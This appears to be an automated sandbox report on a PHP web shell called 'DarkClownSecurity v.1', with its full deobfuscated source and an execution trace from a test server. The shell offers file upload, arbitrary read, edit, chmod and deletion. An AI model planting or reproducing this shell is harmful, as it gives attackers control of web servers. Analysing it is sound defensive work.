news.php

md5: d4bfd4127e4be5a0ededdecebfdbef10

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Emails
zhieend@gmail.com (Deobfuscated, HTML)

Environment
error_reporting (Deobfuscated, Traces)
getcwd (Deobfuscated, Traces)
php_uname (Deobfuscated, Traces)
set_time_limit (Deobfuscated, Traces)

Files
copy (Deobfuscated)
file_get_contents (Deobfuscated)

Input
_FILES (Deobfuscated)
_GET (Deobfuscated)
_POST (Deobfuscated, Traces)

Title
DarkClownSecurity v.1 (Deobfuscated, HTML)

URLs
https://1.bp.blogspot.com/-w6rsqSSKX4E/XVE88z_sBVI/AAAAAAAAEHo/gHbDiWE98wEmfhm4wugU_-F_VZoogV4SACEwYBhgL/s320/dfe21829-f06a-4ebd-8981-d77782bd1614.jpg (Deobfuscated, HTML)

Deobfuscated PHP code
 <?php 
$i = "<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach(\$_POST as \$key=>\$value){\$_POST[\$key]=stripslashes(\$value);}}?>\n<!DOCTYPE html>\n<html lang=\"en-US\">\n\n\t\t <head>\n\t\t\t <meta charset=\"utf-8\">\n\t\t\t <meta name=\"viewport\" content=\"width=device-width\">\n\t\t\t \n\t\t\t\t<title>DarkClownSecurity v.1</title>\n\t\t\t\t<link rel=\"icon\" href=\"//i.postimg.cc/CL3wFSrQ/rsz-index-1.png\" />\n\t\t\t\t<link rel=\"stylesheet\" href=\"//fonts.googleapis.com/css?family=Berkshire+Swash\" type=\"text/css\">\n\t\t\t\t<link rel=\"stylesheet\" href=\"//0x5a455553.github.io/MARIJUANA/MKY.css\" type=\"text/css\">\n\t\t\t\t\n\t\t </head>\n\t\t \n\t\t <body>\n\t\t\t <h1>\n\t\t\t\t<center>\n\t\t\t\t\t<a href=\"<?php \$url=basename(\$_SERVER['PHP_SELF']);echo \$url;?>\">DarkClownSecurity v.1<br><img width=\"300\" height=\"250\" src=\"https://1.bp.blogspot.com/-w6rsqSSKX4E/XVE88z_sBVI/AAAAAAAAEHo/gHbDiWE98wEmfhm4wugU_-F_VZoogV4SACEwYBhgL/s320/dfe21829-f06a-4ebd-8981-d77782bd1614.jpg\"></a>\n\t\t\t\t</center>\n\t\t\t </h1>\n\t\t\t \n\t\t\t <table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<?php echo php_uname();?>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n<?php\n if(isset(\$_GET['path'])){\$path=\$_GET['path'];}else {\$path=getcwd();}\$path=str_replace('\\\\','/',\$path);\$paths=explode('/',\$path);foreach(\$paths as \$id=>\$pat){if(\$pat==''&&\$id==0){\$a=true;echo '\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=/\">/</a>';continue;}if(\$pat=='')continue;echo '\t\t\t\t\t\t\t\n\t\t\t\t\t\t<a class=\"wrn\" href=\"?path=';for(\$i=0;\$i<=\$id;\$i++){echo \"\$paths[\$i]\";if(\$i!=\$id)echo \"/\";}echo '\">'.\$pat.'</a>/';}echo '\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\n\t\t\t\t<tr>\n\t\t\t\t\t<td>';if(isset(\$_FILES['file'])){if(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){echo '\n\t\t\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t';}else{echo '\n\t\t\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br>\n\t\t\t\t\t\t';}}?>\n\n\t\t\t\t\t\t<form enctype=\"multipart/form-data\" method=\"POST\">\n\t\t\t\t\t\t\t<input type=\"file\" name=\"file\" />\n\t\t\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t\t\t</form>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n<?php\n if(isset(\$_GET['filesrc'])){echo \"\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<center>\n\t\t\t\t\t\";echo \"<font color=\\\"#00FF66 \\\">\".\$_GET['filesrc'].\"</font>\";echo '\n\t\t\t\t\t</center>\n\t\t\t\t\t</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t\n\t\t\t<br>';echo('\n\t\t\t\n\t\t\t<pre>\n'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'\t\t\t\n\t\t\t</pre>');}elseif(isset(\$_GET['option'])&&\$_POST['opt']!='delete'){echo '\t\t\t\t</table>\n\t\t \n\t\t\t\t<br>\n\t\t \n\t\t\t\t<center>'.\$_POST['path'].'\n\t\t\t\t\n\t\t\t\t<br>\n\t\t\t\t<br>';if(\$_POST['opt']=='chmod'){if(isset(\$_POST['perm'])){if(chmod(\$_POST['path'],\$_POST['perm'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\tPermission : \n\t\t\t\t\t<input name=\"perm\" type=\"text\" size=\"4\" value=\"<?php echo substr(sprintf('%o',fileperms(\$_POST['path'])),-4);?>\" />\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"chmod\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }elseif(\$_POST['opt']=='rename'){if(isset(\$_POST['newname'])){if(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}\$_POST['name']=\$_POST['newname'];}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\tNew Name : \n\t\t\t\t\t<input name=\"newname\" type=\"text\" size=\"20\" value=\"<?php echo \$_POST['name'];?>\" />\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"rename\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }elseif(\$_POST['opt']=='edit'){if(isset(\$_POST['src'])){\$fp=fopen(\$_POST['path'],'w');if(fwrite(\$fp,\$_POST['src'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}fclose(\$fp);}?>\n\n\n\t\t\t\t<form method=\"POST\">\n\t\t\t\t\n\t\t\t\t\t<textarea cols=80 rows=20 name=\"src\">\n<?php echo htmlspecialchars(file_get_contents(\$_POST['path']));?>\n</textarea>\n\t\t\t\t\t\n\t\t\t\t\t<br>\n\t\t\t\t\t\n\t\t\t\t\t<input type=\"hidden\" name=\"path\" value=\"<?php echo \$_POST['path'];?>\">\n\t\t\t\t\t<input type=\"hidden\" name=\"opt\" value=\"edit\">\n\t\t\t\t\t<input type=\"submit\" value=\">>\" />\n\t\t\t\t</form>\n<?php\n }echo '\t\t\t\t</center>';}else{echo '\t\t\t </table>\n\t\t \n\t\t\t <br>\n\t\t \n\t\t\t <center>';if(isset(\$_GET['option'])&&\$_POST['opt']=='delete'){if(\$_POST['type']=='dir'){if(rmdir(\$_POST['path'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}elseif(\$_POST['type']=='file'){if(unlink(\$_POST['path'])){echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"OK\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}else{echo '\n\t\t\t\t\t\n\t\t\t\t<script>alert(\"FAIL\");</script>\n\t\t\t\t\n\t\t\t\t<br>';}}}echo '</center>';\$scandir=scandir(\$path);?>\n\n\n\t\t\t <div id=\"content\">\n\t\t\t\t<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n\t\t\t\t\t<tr class=\"first\">\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Name</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Size</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Permissions</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>Options</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\n\t\t\t\t\t\n<?php\n foreach(\$scandir as \$dir){if(!is_dir(\"\$path/\$dir\")||\$dir=='.'||\$dir=='..')continue;echo \"\t\t\t\t\t\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\\\"wrn\\\" href=\\\"?path=\$path/\$dir\\\">\$dir</a>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>--</center>\n\t\t\t\t\t\t</td>\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\";if(is_writable(\"\$path/\$dir\"))echo '<font color=\"#00BB00\">';elseif(!is_readable(\"\$path/\$dir\"))echo '<font color=\"red\">';echo perms(\"\$path/\$dir\");if(is_writable(\"\$path/\$dir\")||!is_readable(\"\$path/\$dir\"))echo '</font>';echo \"</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\\\"opt\\\">\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"\\\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"delete\\\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"chmod\\\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"rename\\\">Rename</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$dir\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"submit\\\" value=\\\">>\\\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\";}?>\n\n\t\t\t\t\t<tr class=\"first\">\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t\t<td></td>\n\t\t\t\t\t</tr>\n<?php\n foreach(\$scandir as \$file){if(!is_file(\"\$path/\$file\"))continue;\$size=filesize(\"\$path/\$file\")/1024;\$size=round(\$size,3);if(\$size>=1024){\$size=round(\$size/1024,2).' MB';}else{\$size=\$size.' KB';}echo \"\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a class=\\\"wrn\\\" href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\".\$size.\"</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\";if(is_writable(\"\$path/\$file\"))echo '\n\t\t\t\t\t\t\t\t<font color=\"#00BB00\">';elseif(!is_readable(\"\$path/\$file\"))echo '\n\t\t\t\t\t\t\t\t<font color=\"red\">';echo perms(\"\$path/\$file\");if(is_writable(\"\$path/\$file\")||!is_readable(\"\$path/\$file\"))echo '</font>';echo \"\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<center>\n\t\t\t\t\t\t\t\t<form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<select name=\\\"opt\\\">\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"\\\"></option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"delete\\\">Delete</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"chmod\\\">Chmod</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"rename\\\">Rename</option>\n\t\t\t\t\t\t\t\t\t\t<option value=\\\"edit\\\">Edit</option>\n\t\t\t\t\t\t\t\t\t</select>\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$file\\\">\n\t\t\t\t\t\t\t\t\t<input type=\\\"submit\\\" value=\\\">>\\\" />\n\t\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t\t</center>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\";}echo '\n\t\t\t\t</table>\n\t\t\t</div>';}?>\n\n\n\t\t\t<br>\n\t\t\t\n\t\t\t<div class=\"footer\">Hit me [at] <font color=\"red\">zhieend@gmail.com</font></div>\n\t\t\n\t\t</body>\n</html>\n<?php\n function perms(\$file){\$perms=fileperms(\$file);if((\$perms&0xC000)==0xC000){\$info='s';}elseif((\$perms&0xA000)==0xA000){\$info='l';}elseif((\$perms&0x8000)==0x8000){\$info='-';}elseif((\$perms&0x6000)==0x6000){\$info='b';}elseif((\$perms&0x4000)==0x4000){\$info='d';}elseif((\$perms&0x2000)==0x2000){\$info='c';}elseif((\$perms&0x1000)==0x1000){\$info='p';}else {\$info='u';}\$info.=((\$perms&0x0100)?'r':'-');\$info.=((\$perms&0x0080)?'w':'-');\$info.=((\$perms&0x0040)?((\$perms&0x0800)?'s':'x'):((\$perms&0x0800)?'S':'-'));\$info.=((\$perms&0x0020)?'r':'-');\$info.=((\$perms&0x0010)?'w':'-');\$info.=((\$perms&0x0008)?((\$perms&0x0400)?'s':'x'):((\$perms&0x0400)?'S':'-'));\$info.=((\$perms&0x0004)?'r':'-');\$info.=((\$perms&0x0002)?'w':'-');\$info.=((\$perms&0x0001)?((\$perms&0x0200)?'t':'x'):((\$perms&0x0200)?'T':'-'));return \$info;}?>";
function x($i)
{
    $t = tempnam("/tmp", "0");
    $h = fopen($t, "w+");
    fwrite($h, $i);
    fclose($h);
    require $t;
    unlink($t);
    return get_defined_vars();
}
extract(x($i));
?>	
Execution traces
data/traces/d4bfd4127e4be5a0ededdecebfdbef10_trace-1676253638.6496.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:01:04.547461]
1	0	1	0.000172	393512
1	3	0	0.000314	417248	{main}	1		/var/www/html/uploads/news.php	0	0
2	4	0	0.000333	417248	rawurldecode	0		/var/www/html/uploads/news.php	2	1	'%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%0A%09%09%20%3Chead%3E%0A%09%09%09%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%09%09%09%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%09%09%09%20%0A%09%09%09%09%3Ctitle%3EDarkClownSecurity%20v.1%3C%2Ftit'
2	4	1	0.000578	437760
2	4	R			'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>DarkClownSecurity v.1</title>\n\t\t\t\t<link rel="icon" href="//i.postimg.cc/CL3wFSrQ/rsz-index-1.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type='
1		A						/var/www/html/uploads/news.php	2	$i = '<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>DarkClownSecurity v.1</title>\n\t\t\t\t<link rel="icon" href="//i.postimg.cc/CL3wFSrQ/rsz-index-1.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type='
2	5	0	0.000690	437728	x	1		/var/www/html/uploads/news.php	14	1	'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>DarkClownSecurity v.1</title>\n\t\t\t\t<link rel="icon" href="//i.postimg.cc/CL3wFSrQ/rsz-index-1.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type='
3	6	0	0.000739	437728	tempnam	0		/var/www/html/uploads/news.php	6	2	'/tmp'	'0'
3	6	1	0.000782	437832
3	6	R			'/tmp/0Hi7EU3'
2		A						/var/www/html/uploads/news.php	6	$t = '/tmp/0Hi7EU3'
3	7	0	0.000811	437768	fopen	0		/var/www/html/uploads/news.php	7	2	'/tmp/0Hi7EU3'	'w+'
3	7	1	0.000842	438408
3	7	R			resource(4) of type (stream)
2		A						/var/www/html/uploads/news.php	7	$h = resource(4) of type (stream)
3	8	0	0.000870	438336	fwrite	0		/var/www/html/uploads/news.php	8	2	resource(4) of type (stream)	'<?php\n set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>\n<!DOCTYPE html>\n<html lang="en-US">\n\n\t\t <head>\n\t\t\t <meta charset="utf-8">\n\t\t\t <meta name="viewport" content="width=device-width">\n\t\t\t \n\t\t\t\t<title>DarkClownSecurity v.1</title>\n\t\t\t\t<link rel="icon" href="//i.postimg.cc/CL3wFSrQ/rsz-index-1.png" />\n\t\t\t\t<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type='
3	8	1	0.000934	438400
3	8	R			8812
3	9	0	0.000948	438336	fclose	0		/var/www/html/uploads/news.php	9	1	resource(4) of type (stream)
3	9	1	0.001026	437936
3	9	R			TRUE
3	10	0	0.001318	492864	require	1	/tmp/0Hi7EU3	/var/www/html/uploads/news.php	10	0
4	11	0	0.001345	492864	set_time_limit	0		/tmp/0Hi7EU3	2	1	0
4	11	1	0.001360	492928
4	11	R			FALSE
4	12	0	0.001374	492896	error_reporting	0		/tmp/0Hi7EU3	2	1	0
4	12	1	0.001386	492936
4	12	R			22527
4	13	0	0.001399	492896	get_magic_quotes_gpc	0		/tmp/0Hi7EU3	2	0
4	13	1	0.001411	492896
4	13	R			FALSE
4	14	0	0.001425	492896	basename	0		/tmp/0Hi7EU3	20	1	'/uploads/news.php'
4	14	1	0.001439	492968
4	14	R			'news.php'
3		A						/tmp/0Hi7EU3	20	$url = 'news.php'
4	15	0	0.001464	492936	php_uname	0		/tmp/0Hi7EU3	27	0
4	15	1	0.001477	493048
4	15	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	16	0	0.001496	492936	getcwd	0		/tmp/0Hi7EU3	31	0
4	16	1	0.001507	492984
4	16	R			'/var/www/html/uploads'
3		A						/tmp/0Hi7EU3	31	$path = '/var/www/html/uploads'
4	17	0	0.001532	492984	str_replace	0		/tmp/0Hi7EU3	31	3	'\\'	'/'	'/var/www/html/uploads'
4	17	1	0.001547	493080
4	17	R			'/var/www/html/uploads'
3		A						/tmp/0Hi7EU3	31	$path = '/var/www/html/uploads'
4	18	0	0.001570	492984	explode	0		/tmp/0Hi7EU3	31	2	'/'	'/var/www/html/uploads'
4	18	1	0.001584	493560
4	18	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/tmp/0Hi7EU3	31	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/tmp/0Hi7EU3	31	$id = 0
3		A						/tmp/0Hi7EU3	31	$a = TRUE
3		A						/tmp/0Hi7EU3	31	$id = 1
3		A						/tmp/0Hi7EU3	33	$i = 0
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	31	$id = 2
3		A						/tmp/0Hi7EU3	33	$i = 0
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	31	$id = 3
3		A						/tmp/0Hi7EU3	33	$i = 0
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	31	$id = 4
3		A						/tmp/0Hi7EU3	33	$i = 0
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
3		A						/tmp/0Hi7EU3	33	$i++
4	19	0	0.001804	493488	scandir	0		/tmp/0Hi7EU3	160	1	'/var/www/html/uploads'
4	19	1	0.001836	494112
4	19	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'news.php', 5 => 'prepend.php']
3		A						/tmp/0Hi7EU3	160	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'news.php', 5 => 'prepend.php']
4	20	0	0.001874	494128	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/.'
4	20	1	0.001889	494192
4	20	R			TRUE
4	21	0	0.001903	494160	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/..'
4	21	1	0.001918	494208
4	21	R			TRUE
4	22	0	0.001931	494168	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/.htaccess'
4	22	1	0.001946	494208
4	22	R			FALSE
4	23	0	0.001960	494168	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/data'
4	23	1	0.001974	494208
4	23	R			TRUE
4	24	0	0.001988	494168	is_writable	0		/tmp/0Hi7EU3	190	1	'/var/www/html/uploads/data'
4	24	1	0.002006	494208
4	24	R			TRUE
4	25	0	0.002020	494168	perms	1		/tmp/0Hi7EU3	190	1	'/var/www/html/uploads/data'
5	26	0	0.002032	494168	fileperms	0		/tmp/0Hi7EU3	264	1	'/var/www/html/uploads/data'
5	26	1	0.002045	494208
5	26	R			16895
4		A						/tmp/0Hi7EU3	264	$perms = 16895
4		A						/tmp/0Hi7EU3	264	$info = 'd'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4	25	1	0.002150	494208
4	25	R			'drwxrwxrwx'
4	27	0	0.002164	494168	is_writable	0		/tmp/0Hi7EU3	190	1	'/var/www/html/uploads/data'
4	27	1	0.002179	494208
4	27	R			TRUE
4	28	0	0.002193	494168	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/news.php'
4	28	1	0.002208	494208
4	28	R			FALSE
4	29	0	0.002222	494176	is_dir	0		/tmp/0Hi7EU3	181	1	'/var/www/html/uploads/prepend.php'
4	29	1	0.002236	494224
4	29	R			FALSE
4	30	0	0.002250	494168	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/.'
4	30	1	0.002264	494192
4	30	R			FALSE
4	31	0	0.002277	494160	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/..'
4	31	1	0.002290	494208
4	31	R			FALSE
4	32	0	0.002303	494168	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/.htaccess'
4	32	1	0.002317	494208
4	32	R			TRUE
4	33	0	0.002330	494168	filesize	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/.htaccess'
4	33	1	0.002343	494208
4	33	R			64
3		A						/tmp/0Hi7EU3	219	$size = 0.0625
4	34	0	0.002366	494112	round	0		/tmp/0Hi7EU3	219	2	0.0625	3
4	34	1	0.002379	494184
4	34	R			0.063
3		A						/tmp/0Hi7EU3	219	$size = 0.063
3		A						/tmp/0Hi7EU3	219	$size = '0.063 KB'
4	35	0	0.002414	494208	is_writable	0		/tmp/0Hi7EU3	228	1	'/var/www/html/uploads/.htaccess'
4	35	1	0.002430	494248
4	35	R			FALSE
4	36	0	0.002443	494208	is_readable	0		/tmp/0Hi7EU3	229	1	'/var/www/html/uploads/.htaccess'
4	36	1	0.002462	494248
4	36	R			TRUE
4	37	0	0.002476	494208	perms	1		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/.htaccess'
5	38	0	0.002488	494208	fileperms	0		/tmp/0Hi7EU3	264	1	'/var/www/html/uploads/.htaccess'
5	38	1	0.002501	494248
5	38	R			33188
4		A						/tmp/0Hi7EU3	264	$perms = 33188
4		A						/tmp/0Hi7EU3	264	$info = '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4	37	1	0.002604	494248
4	37	R			'-rw-r--r--'
4	39	0	0.002618	494208	is_writable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/.htaccess'
4	39	1	0.002634	494248
4	39	R			FALSE
4	40	0	0.002647	494208	is_readable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/.htaccess'
4	40	1	0.002662	494248
4	40	R			TRUE
4	41	0	0.002676	494208	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/data'
4	41	1	0.002690	494248
4	41	R			FALSE
4	42	0	0.002703	494208	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/news.php'
4	42	1	0.002718	494248
4	42	R			TRUE
4	43	0	0.002730	494208	filesize	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/news.php'
4	43	1	0.002743	494248
4	43	R			17451
3		A						/tmp/0Hi7EU3	219	$size = 17.0419921875
4	44	0	0.002766	494112	round	0		/tmp/0Hi7EU3	219	2	17.0419921875	3
4	44	1	0.002779	494184
4	44	R			17.042
3		A						/tmp/0Hi7EU3	219	$size = 17.042
3		A						/tmp/0Hi7EU3	219	$size = '17.042 KB'
4	45	0	0.002819	494320	is_writable	0		/tmp/0Hi7EU3	228	1	'/var/www/html/uploads/news.php'
4	45	1	0.002835	494360
4	45	R			FALSE
4	46	0	0.002848	494320	is_readable	0		/tmp/0Hi7EU3	229	1	'/var/www/html/uploads/news.php'
4	46	1	0.002863	494360
4	46	R			TRUE
4	47	0	0.002876	494320	perms	1		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/news.php'
5	48	0	0.002888	494320	fileperms	0		/tmp/0Hi7EU3	264	1	'/var/www/html/uploads/news.php'
